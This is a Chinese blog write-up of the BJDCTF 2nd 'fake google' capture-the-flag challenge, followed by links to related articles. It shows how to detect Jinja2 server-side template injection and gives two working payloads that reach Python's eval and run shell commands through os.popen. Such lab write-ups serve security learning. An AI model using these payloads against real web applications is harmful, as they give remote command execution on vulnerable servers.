[BJDCTF 2nd]fake google -wp

最新推荐文章于 2020-12-11 21:15:12 发布
最新推荐文章于 2020-12-11 21:15:12 发布
阅读量248 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107015594
版权

在这里插入图片描述打开后一个google搜索框,查看源码没什么,随便输入点东西搜索
在这里插入图片描述在这里插入图片描述查看源码,提示ssti
在这里插入图片描述测试一下,存在ssti
在这里插入图片描述1 、获取字符串的类对象

''.__class__

在这里插入图片描述

2 、寻找基类

''.__class__.__mro__

在这里插入图片描述

3 、寻找可用引用

''.__class__.__mro__[1].__subclasses__()

在最后面发现模块引擎类型
<class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’>]
是jinja2

有一个针对jinja2的通用payload

payload:{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat ../flag').read()") }}{% endif %}{% endfor %}

详细请参考:https://www.cnblogs.com/yesec/p/12548206.html

还有一个更牛一点的payload也可以使用

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}         //poppen的参数就是要执行的命令
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

详细请参考:https://blog.csdn.net/zz_Caleb/article/details/96480967

在这里插入图片描述

冰可乐不加可乐
关注
[BJDCTF 2nd]fake google
kuller_Yan的博客
06-13 334
[BJDCTF 2nd]fake google wp from Kuller_Yan 先打开靶机: 测试是否存在ssti注入{{1+1}} 进行查询{{''.__class__}} next{{''.__class__.__bases__}} next:{{''.__class__.__bases__[0].__subclasses__()}} 找到第169个{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['
[BJDCTF 2nd]fake google 1
weixin_45674567的博客
04-22 520
参考文章https://blog.csdn.net/u011377996/article/details/86776181 确定模块注入: 具体网址内容: http://abcfb0f6-5bad-49f4-aadd-115d99530dba.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%...
vue-fake3d-image-effect:使用WebGL的假3D图像效果-w VueJS-SSR兼容
02-01
:party_popper: Vue Fake3d图像效果 使用WebGL制作的假3D图像效果-带VueJS-兼容SSR 安装 该软件包可在npm上获得。 # Save it as a dep npm install --save @luxdamore/vue-fake3d-image-effect 用法 作为一个组成...
fake-gcs-server:Google Cloud Storage模拟器和测试库
02-04
fake-gcs-server为Google Cloud Storage API提供了一个模拟器。 它可以用作Go项目中的库和/或独立的二进制/ Docker映像。 该库位于包中,可以在Go包的测试套件中使用。 该仿真器作为二进制文件提供,可以手动构建...
BUUCTF__[BJDCTF 2nd]fake google_题解
风过江南乱的博客
07-16 786
SSTI/沙盒逃逸详细总结 SSTI模板注入 服务端模板注入攻击
fake-google-keyboard-shortcuts-crx插件
04-04
标题中的“fake-google-keyboard-shortcuts-crx插件”是一个针对谷歌浏览器(Chrome)的扩展程序,主要用于模拟和实现Google曾经提供的键盘快捷方式。这款插件的目的是为用户提供一种更高效、更便捷的浏览体验,让...
Debunker - Detect Fake News-crx插件
04-03
语言:English 使用先进的Web抓取技术和机器学习算法检测不可靠的新闻站点。 Debunker是一种数字工具,能够准确评估任何在线新闻来源的可靠性。 与当前仅通过分析网站标题来确定来源是否可靠的解决方案不同,Debunker...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
[BJDCTF 2nd]fake google Writeup(SSTI攻击原理分析)
StevenOnesir的博客
12-03 333
利用本题,我们开始讲解简单的SSTI知识。 首先进入题目界面,发现是一个大大的google搜索界面(仿制) 在搜索栏随意输入后,发现跳转到qaq,并以get方式传入了一个name的变量。 然后我们开始修改name变量的值。 不要因为我说要讲框架注入咱们就直接上SSTI的payload。。。正常测试找攻击点咱们也该试试1’ 之类的sql注入。。。 然后我们发现输入SSTI的表达式构造会出现回显: ?name={{2*2}} 这里附一张各类框架的结构图(网图): 漏洞形成的原因其实与sql等大同小异
BUUCTF:[BJDCTF 2nd]fake google
末初的CSDN博客
11-08 425
https://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google 查看页面源代码 SSTI注入 Tplmap一把梭直接拿下 Tplmap项目地址:https://github.com/epinna/tplmap python2 .\tplmap.py -u "http://7917ad55-85e8-4fec-99db-55e2a05a3cd3.node3.buuoj.cn/qaq?name=mochu" 模板是Jinja2,直接--os-shel
【学习笔记2】buu [BJDCTF 2nd]fake google
weixin_43553654的博客
05-09 248
点进去一看什么都没有,在搜索栏随便敲了个1上去,搜索一下 查看源码<!--ssssssti & a little trick --> P3's girlfirend is : 1<br><hr>这提示简直不要更明显就是SSTI继续输入{{7*7}},发现给出了49的运算结果,怎么这么像我之前看到的flask模板注入呢。执行我之前搜集...
Buu-crypto-write up
seven749的博客
10-14 192
Buu-crypto-write up 1.password 这道题目是一道弱密码题目,通过所给信息来猜密码。key的格式后面由十位数字构成,题目给了姓名和生日,故猜测密码为zs19900315 2.Rabbit Rabbit流密码,直接采用无密钥在线解码,即可得到flag。 3.篱笆墙的影子 我们一般看到括号自然而然会想到括号前面的为flag,仔细观察前面的字符串felhaagv会发现第1,3,5,7个字母组成了flag,故想到是栅栏密码,分为两组,一组有13个字符,解密得到flag{wethinkw
BUUCTF-Crypto-老文盲了+Alice与Bob题解
weixin_47869330的博客
12-11 1375
题目: 老文盲了 罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝 解题: 想了一下文字加密的,只记得与佛论禅,藏头诗,看文字字形里有没有某个特殊字 (如每个字里有‘口’)的算一组 想不出什么名堂,搜搜每个字念什么,在线文字转拼音 BJD{这就是flag直接交了吧} OK fine flag:flag{淛匶襫黼瀬鎶軄鶛驕鳓哵} Alice与Bob: 题目: 解题: 根据题目:在线分解质因数: 新的数为:101999966233 再进行32位md5加密: 结果即为flag:flag{d450209323
CTF之做题总结(二)
qq_45970607的博客
10-04 998
一、Crypto(密码学) 1、Railfence(栅栏密码) 我们先来看一下题目描述: 从题目Railfence(栅栏密码)和题目描述中我们能得到的信息是这道题是栅栏密码,然后题目描述里还提到了一个农妇在栅栏里喂5只小鸡,由此我们可以推测出这道栅栏密码的栏数应该是5,但是解密之后我们发现栏数设置为5不正确,然后试了试其它数字,发现都不是正确答案,在迷惑了好久之后,问了一下同学我才知道还有另一种形式的栅栏密码的存在:W型栅栏密码。知道了这道题是W型栅栏密码,于是在网上搜索了一下相关内容才大概了解了所谓的W
BUU-CTF——WP(Cryptp[1~30])
hahaha233330的博客
09-14 1209
好久没更新了,手生得很,重新练起来! 这次挑战BUU,贴一下网址:点我 Cryptp 1、MD5 直接把文本复制用url解码一下即可得到flag 2、Url编码 直接把文本复制用url解码一下即可得到flag。 3、看我回旋踢 文本为不规则排列,猜测是凯撒密码,用工具解密,多试几次得到以"flag"开头的排列。 4、一眼就解密 啊这 5、摩丝 摩斯电码解密得到,直接解码是全小写,但这道题正确flag为全大写。 6、签到 草 7、password 这题没什么意思,就是名字缩写+生日
python的fake-useragent模块演示
最新发布
04-05
以下是使用Python的fake-useragent模块的演示: 1. 安装fake-useragent模块 可以使用命令`pip install fake-useragent`来安装fake-useragent模块。 2. 导入fake-useragent模块 在Python代码中,我们需要导入fake...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值